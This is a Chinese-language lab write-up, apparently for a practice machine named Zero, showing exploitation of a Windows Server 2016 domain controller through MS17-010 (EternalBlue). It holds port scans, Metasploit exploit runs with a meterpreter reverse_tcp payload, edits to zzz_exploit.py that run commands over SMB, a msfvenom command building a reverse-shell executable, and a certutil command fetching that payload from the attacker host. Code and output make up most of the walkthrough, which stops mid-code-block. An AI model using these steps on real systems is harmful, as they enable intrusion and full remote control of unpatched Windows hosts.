Zero
Zero
需要改脚本执行配置的永恒之蓝漏洞靶场。。。。
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali💀kali)-[~/temp/zero]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.100:53
Open 192.168.10.100:88
Open 192.168.10.100:135
Open 192.168.10.100:139
Open 192.168.10.100:389
Open 192.168.10.100:445
Open 192.168.10.100:464
Open 192.168.10.100:593
Open 192.168.10.100:636
Open 192.168.10.100:3268
Open 192.168.10.100:5985
Open 192.168.10.100:9389
Open 192.168.10.100:49667
Open 192.168.10.100:49668
Open 192.168.10.100:49669
Open 192.168.10.100:49670
Open 192.168.10.100:49685
Open 192.168.10.100:49710
漏洞利用
msf脚本利用
无web渗透,但是开放了445端口服务,尝试探索一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
┌──(kali💀kali)-[~/temp/zero]
└─$ msfconsole -q
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .
27 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
28 \_ target: Execute payload (x64) . . . .
29 \_ target: Neutralize implant . . . .
Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipe yes List of named pipes to check
s.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.10.100
rhosts => 192.168.10.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.10.100:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.10.100:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma
chines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin
es.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.10.100
rhosts => 192.168.10.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.104
lhost => 192.168.10.104
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.10.104:4444
[*] 192.168.10.100:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.100:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)
[*] 192.168.10.100:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.10.100:445 - The target is vulnerable.
[*] 192.168.10.100:445 - Connecting to target for exploitation.
[+] 192.168.10.100:445 - Connection established for exploitation.
[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.10.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.10.100:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.10.100:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.100:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.100:445 - Starting non-paged pool grooming
[+] 192.168.10.100:445 - Sending SMBv2 buffers
[+] 192.168.10.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.100:445 - Sending final SMBv2 buffers.
[*] 192.168.10.100:445 - Sending last fragment of exploit packet!
[*] 192.168.10.100:445 - Receiving response from exploit packet
[+] 192.168.10.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.100:445 - Sending egg to corrupted connection.
[*] 192.168.10.100:445 - Triggering free of corrupted buffer.
[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.10.100:445 - Connecting to target for exploitation.
[+] 192.168.10.100:445 - Connection established for exploitation.
[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)
[*] 192.168.10.100:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.10.100:445 - 0x00000010 30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61 016 Standard Eva
[*] 192.168.10.100:445 - 0x00000020 6c 75 61 74 69 6f 6e 20 31 34 33 39 33 luation 14393
[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.100:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet
^C[-] 192.168.10.100:445 - Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf6 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named yes List of named pipes to check
_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.10.100
rhosts => 192.168.10.100
msf6 exploit(windows/smb/ms17_010_psexec) > set lhost 192.168.10.104
lhost => 192.168.10.104
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.10.104:4444
[*] 192.168.10.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 192.168.10.100:445 - Built a write-what-where primitive...
[+] 192.168.10.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.10.100:445 - Selecting PowerShell target
[*] 192.168.10.100:445 - Executing the payload...
[+] 192.168.10.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
重新扫描一下相关配置:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(kali💀kali)-[~/temp/zero/AutoBlue-MS17-010]
└─$ nmap -Pn $IP 445 -sC -sV -sT -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 04:17 EDT
Nmap scan report for 192.168.10.100
Host is up (0.0034s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 23:18:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: DC01
| NetBIOS computer name: DC01\x00
| Domain name: zero.hmv
| Forest name: zero.hmv
| FQDN: DC01.zero.hmv
|_ System time: 2024-08-10T16:18:02-07:00
|_clock-skew: mean: 17h20m01s, deviation: 4h02m29s, median: 15h00m00s
| smb2-time:
| date: 2024-08-10T23:18:02
|_ start_date: 2024-08-10T21:41:37
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:15:ea:1c (Oracle VirtualBox virtual NIC)
Nmap scan report for 445 (0.0.1.189)
Host is up.
All 1000 scanned ports on 445 (0.0.1.189) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 67.52 seconds
发现存在一个域名解析,修改相关配置,重新进行利用,还是不行。。。尝试网上的其他脚本:
https://github.com/3ndG4me/AutoBlue-MS17-010
┌──(kali💀kali)-[~/temp/zero/AutoBlue-MS17-010]
└─$ ls -la
total 200
drwxr-xr-x 4 kali kali 4096 Aug 10 04:16 .
drwxr-xr-x 3 kali kali 4096 Aug 10 04:07 ..
-rwxr-xr-x 1 kali kali 26444 Aug 10 04:07 eternalblue_exploit10.py
-rwxr-xr-x 1 kali kali 25741 Aug 10 04:07 eternalblue_exploit7.py
-rwxr-xr-x 1 kali kali 24106 Aug 10 04:07 eternalblue_exploit8.py
-rwxr-xr-x 1 kali kali 2801 Aug 10 04:07 eternal_checker.py
-rwxr-xr-x 1 kali kali 1070 Aug 10 04:07 LICENSE
-rwxr-xr-x 1 kali kali 3640 Aug 10 04:07 listener_prep.sh
-rwxr-xr-x 1 kali kali 25943 Aug 10 04:07 mysmb.py
drwxr-xr-x 2 kali kali 4096 Aug 10 04:07 __pycache__
-rwxr-xr-x 1 kali kali 5352 Aug 10 04:07 README.md
-rwxr-xr-x 1 kali kali 8 Aug 10 04:07 requirements.txt
drwxr-xr-x 2 kali kali 4096 Aug 10 04:13 shellcode
-rwxr-xr-x 1 kali kali 49249 Aug 10 04:07 zzz_exploit.py
┌──(kali💀kali)-[~/temp/zero/AutoBlue-MS17-010]
└─$ python3 eternal_checker.py 192.168.10.100
[*] Target OS: Windows Server 2016 Standard Evaluation 14393
[!] The target is not patched
=== Testing named pipes ===
[+] Found pipe 'netlogon'
[+] Found pipe 'lsarpc'
[+] Found pipe 'samr'
[*] Done
然后按照README.md尝试了接下来的操作,但是没有弹回来,不知道是不是哪里搞错了。
脚本修改利用
windows做的少,只能跟着wp做了,尝试去这个库的源仓库看看:https://github.com/worawit/MS17-010
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 checker.py 192.168.10.100
Traceback (most recent call last):
File "checker.py", line 1, in <module>
from mysmb import MYSMB
File "/home/kali/temp/zero/MS17-010/mysmb.py", line 3, in <module>
from impacket import smb, smbconnection
ImportError: No module named impacket
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 -m pip install impacket==0.9.20
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 checker.py 192.168.10.100
Target OS: Windows Server 2016 Standard Evaluation 14393
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_ACCESS_DENIED
修改掉相关特征,尝试进行利用:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
修改为:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def smb_pwn(conn, arch):
# smbConn = conn.get_smbconnection()
# print('creating file c:\\pwned.txt on the target')
# tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# smbConn.closeFile(tid2, fid2)
# smbConn.disconnectTree(tid2)
# smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
service_exec(conn, r'cmd /c ping 192.168.10.104')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
尝试执行,看一下能否接收到ping:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
# kali1
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ cp zzz_exploit.py zzz_exploit_change.py
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ vim zzz_exploit_change.py
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ chmod +x *
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 zzz_exploit_change.py 192.168.10.100
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: netlogon
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffc407182b8910
SESSION: 0xffffb406737d6450
FLINK: 0xffffb406750a2098
InParam: 0xffffb4067509616c
MID: 0x2903
unexpected alignment, diff: 0xb098
leak failed... try again
CONNECTION: 0xffffc407182b8910
SESSION: 0xffffb406737d6450
FLINK: 0xffffb406750b1098
InParam: 0xffffb406750ab16c
MID: 0x2903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 192.168.10.100.....
Creating service gFLX.....
Starting service gFLX.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service gFLX.....
Done
# kali2
┌──(kali💀kali)-[~/temp/zero]
└─$ sudo tcpdump -i eth1 host 192.168.10.100
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
06:17:05.809879 IP 192.168.10.100 > 224.0.0.252: igmp v2 report 224.0.0.252
06:17:06.321587 IP 192.168.10.100 > 224.0.0.251: igmp v2 report 224.0.0.251
06:17:15.222515 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [S], seq 2544194393, win 32120, options [mss 1460,sackOK,TS val 3299061392 ecr 0,nop,wscale 7], length 0
06:17:15.223170 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [S.], seq 2916466824, ack 2544194394, win 8192, options [mss 1460,nop,wscale 8,sackOK,TS val 6384526 ecr 3299061392], length 0
06:17:15.223189 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [.], ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 0
06:17:15.223537 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 1:52, ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 51
06:17:15.224395 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 1:210, ack 52, win 2081, options [nop,nop,TS val 6384527 ecr 3299061393], length 209
06:17:15.224409 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [.], ack 210, win 250, options [nop,nop,TS val 3299061394 ecr 6384527], length 0
06:17:15.225756 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 52:192, ack 210, win 250, options [nop,nop,TS val 3299061395 ecr 6384527], length 140
06:17:15.226811 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 210:552, ack 192, win 2080, options [nop,nop,TS val 6384529 ecr 3299061395], length 342
06:17:15.229722 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 192:355, ack 552, win 249, options [nop,nop,TS val 3299061399 ecr 6384529], length 163
06:17:15.231001 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 552:698, ack 355, win 2080, options [nop,nop,TS val 6384533 ecr 3299061399], length 146
06:17:15.232466 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 355:431, ack 698, win 249, options [nop,nop,TS val 3299061402 ecr 6384533], length 76
06:17:15.233213 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 698:748, ack 431, win 2080, options [nop,nop,TS val 6384536 ecr 3299061402], length 50
06:17:15.234234 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 431:526, ack 748, win 249, options [nop,nop,TS val 3299061404 ecr 6384536], length 95
06:17:15.234880 IP 192.168.10.100.microsoft-ds > 192.168.10.104.34468: Flags [P.], seq 748:787, ack 526, win 2079, options [nop,nop,TS val 6384537 ecr 3299061404], length 39
06:17:15.236117 IP 192.168.10.104.34468 > 192.168.10.100.microsoft-ds: Flags [P.], seq 526:621, ack 787, win 249, options [nop,nop,TS val 3299061405 ecr 6384537], length 95
................
说明可以正常执行命令,尝试修改进行反弹shell。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def smb_pwn(conn, arch):
smbConn = conn.get_smbconnection()
# print('creating file c:\\pwned.txt on the target')
# tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# smbConn.closeFile(tid2, fid2)
# smbConn.disconnectTree(tid2)
smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
service_exec(conn, r'cmd /c c:\\system.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
然后生成一个shell.exe:
1
2
3
4
5
6
7
8
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.104 LPORT=1234 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
尝试执行:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 zzz_exploit_change.py 192.168.10.100
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: netlogon
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffc4071a296020
SESSION: 0xffffb4067522e790
FLINK: 0xffffb406750a2098
InParam: 0xffffb4067509616c
MID: 0x3a03
unexpected alignment, diff: 0xb098
leak failed... try again
CONNECTION: 0xffffc4071a296020
SESSION: 0xffffb4067522e790
FLINK: 0xffffb406750b1098
InParam: 0xffffb406750ab16c
MID: 0x3a03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 192.168.10.100.....
Creating service benf.....
Starting service benf.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service benf.....
Done
发现弹不过来。。。。。不使用默认的试试:
certutil -a -urlcache -gmt -split -f http://192.168.10.104:8888/shell.exe c:\\windows\\temp\\shell.exe
-a处理非证书数据
-f覆盖现有文件。
-split保存到文件。
-URLCache显示或删除URL缓存条目。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def smb_pwn(conn, arch):
# smbConn = conn.get_smbconnection()
# print('creating file c:\\pwned.txt on the target')
# tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# smbConn.closeFile(tid2, fid2)
# smbConn.disconnectTree(tid2)
# smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
service_exec(conn, r'cmd /c certutil -a -urlcache -gmt -split -f http://192.168.10.104:8888/shell.exe c:\\windows\\temp\\shell.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
然后改一个配置选项,就是check选的,哪个都行,这里随便弄了一个:
1
2
3
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
结果又发生了报错:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali💀kali)-[~/temp/zero/MS17-010]
└─$ python2 zzz_exploit_change.py 192.168.10.100 netlogon
Target OS: Windows Server 2016 Standard Evaluation 14393
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffc407182ba020
SESSION: 0xffffb406745019d0
FLINK: 0xffffb406750ab098
InParam: 0xffffb406750a216c
MID: 0x2b03
unexpected alignment, diff: 0x8098
leak failed... try again
CONNECTION: 0xffffc407182ba020
SESSION: 0xffffb406745019d0
FLINK: 0xffffb406750b7098
InParam: 0xffffb406750b116c
MID: 0x2b03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 192.168.10.100.....
Creating service JygC.....
Starting service JygC.....
SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
Removing service JygC.....
Done
同时另一边python的http.server也没接到请求。。。。。。可能是因为吃了个饭?重启靶机!还是不行,尝试修改配置选项:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def smb_pwn(conn, arch):
# smbConn = conn.get_smbconnection()
# print('creating file c:\\pwned.txt on the target')
# tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# smbConn.closeFile(tid2, fid2)
# smbConn.disconnectTree(tid2)
# smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
service_exec(conn, r'cmd /c certutil -urlcache -gmt -split -f http://192.168.10.104:8888/shell.exe c:\\windows\\temp\\shell.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
这次成功了,不要-a:
然后尝试执行一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def smb_pwn(conn, arch):
# smbConn = conn.get_smbconnection()
# print('creating file c:\\pwned.txt on the target')
# tid2 = smbConn.connectTree('C$')
# fid2 = smbConn.createFile(tid2, '/pwned.txt')
# smbConn.closeFile(tid2, fid2)
# smbConn.disconnectTree(tid2)
# smb_send_file(smbConn, 'shell.exe', 'C', '/system.exe')
#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
